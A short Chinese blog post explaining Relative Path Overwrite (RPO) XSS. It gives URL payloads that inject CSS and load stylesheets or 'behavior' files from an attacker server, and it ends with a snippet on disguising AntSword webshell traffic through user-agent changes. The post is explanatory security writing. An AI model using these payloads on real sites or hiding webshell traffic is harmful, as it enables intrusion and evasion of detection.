0x00
具体原理参考:
Infinite Security: (Relative Path Overwrite) RPO XSS
RPO Gadgets
RPO攻击
0x01
RPO攻击首先利用的是通过相对路径引入的CSS,如
<link href="styles.css" rel="stylesheet" type="text/css" />
当我们在URL最后添加
/%0a{}*{background:red;}/
的时候会发现页面执行了我们的css代码。
通过这点,我们可以做到任意加载服务器上的文件。
假若我们能控制某些文件就可以达到XSS的目的。
几个Payload:
/%0a{}@import url("http://server/style.css")/
/%0a{}img{behavior:url(http://server/test.png);}/
FROM :rickyhao.com | rickyhao.com
流量分析 挂个代理直接抓包就好了 UA头修改 修改蚁剑工作目录的/modules/request.js,这里面默认是antSword/v2.1 一般需要修改一下,不然极其容易被发现,可以利用平常爬虫的一些技巧,随机构造UA头 ``` let USER_AGEN…
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论